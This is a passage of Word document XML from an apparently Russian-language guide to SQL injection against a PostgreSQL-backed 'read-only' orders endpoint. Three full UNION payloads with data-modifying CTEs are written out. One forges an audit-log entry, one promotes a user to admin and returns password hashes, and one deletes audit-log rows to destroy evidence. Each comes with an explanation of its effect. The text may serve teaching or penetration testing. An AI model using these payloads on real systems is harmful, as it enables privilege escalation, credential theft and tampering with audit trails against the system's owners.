          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> логически только читает.</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where_clause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id IS NOT NULL UNION SELECT 1, 'pwn', 0 FROM (WITH ins AS (INSERT INTO audit_log(user_id, action) VALUES (1, 'role_granted_admin') RETURNING id) SELECT 1 FROM ins) sub--</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customer_name, total FROM orders_visible WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1, 'pwn', 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH ins AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSERT INTO audit_log(user_id, action)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    VALUES (1, 'role_granted_admin')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURNING id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1 FROM ins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) sub--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Внешний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, customer_name, total ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает легитимный список заказов. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 1, 'pwn', 0 FROM ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> добавляет одну искусственную строку. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subquery в UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> оборачивает CTE с INSERT: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получает строку с фейковым </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">action='role_granted_admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — выглядит как audit-trail-запись, на самом деле — атакующий пишет в журнал, что роль admin была выдана (для подделки следов).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — UPDATE для эскалации привилегий через RETURNING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: тот же эндпоинт. Application-роль имеет </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(для смены пароля через legitimate password-reset flow). 3.10.1 использует это, чтобы изменить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> чужой строки.</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id = 1 UNION SELECT id, name, total FROM (WITH upd AS (UPDATE users SET role='admin' WHERE id=2 RETURNING id, email, password_hash) SELECT id AS id, email AS name, length(password_hash)::numeric AS total FROM upd) sub--</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customer_name, total FROM orders_visible WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT id, name, total</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH upd AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    UPDATE users SET role='admin' WHERE id=2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURNING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id AS id, email AS name, length(password_hash)::numeric AS total</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  FROM upd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) sub--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эффект:</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Write-эффект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UPDATE users SET role='admin' WHERE id=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — повышение privileges пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до admin. Если application-логика проверяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">role='admin'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для доступа к admin-панели — атакующий получает админ-доступ через свою (или контролируемую) учётку.</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Read-эффект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RETURNING id, email, password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обновлённая строка возвращается в CTE → конвертируется во внешнее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(id, name, total)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через UNION-cast. Атакующий получает hash в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-колонке (как длину, для skip-обхода числового type-фильтра — но реальный hash утечёт, если cast пройдёт).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для извлечения самого hash: использовать UNION-cast в text напрямую (если column-types совпадают) или вывести через 3.4 (time-based) с CTE-обёрткой.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — DELETE для уничтожения evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: тот же эндпоинт. Application-роль имеет </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user_sessions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id IS NOT NULL UNION SELECT count(*), '', 0 FROM (WITH del AS (DELETE FROM audit_log WHERE user_id=current_user::regrole::oid::int RETURNING id) SELECT id FROM del) sub--</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customer_name, total FROM orders_visible WHERE id IS NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT count(*), '', 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  WITH del AS (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    DELETE FROM audit_log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE user_id=current_user::regrole::oid::int</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURNING id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id FROM del</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) sub--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эффект: все строки в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принадлежащие текущему application-user (часто это атакующий — application использует одну роль для всех API-запросов;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 application_user), удаляются. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">count(*)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от удалённых RETURNING — обратная связь, сколько строк было.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_user::regrole::oid::int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> вместо литерала ID — payload работает независимо от реального ID application-роли (опpe определяется в рантайме).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Read-only-эндпоинт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/orders/filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (имя, схема, описание в OpenAPI — всё указывает на read) фактически выполняет write-операцию. Это критическая поломка модели "GET = идемпотент, без побочных эффектов":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OpenAPI/REST spec нарушен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: документация говорит, что эндпоинт read-only.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Authorization-фильтры обходятся</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: middleware, разрешающее GET без CSRF-токена (потому что GET «безопасен»), теперь пропускает write.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Логирование не помогает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: если приложение логирует только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
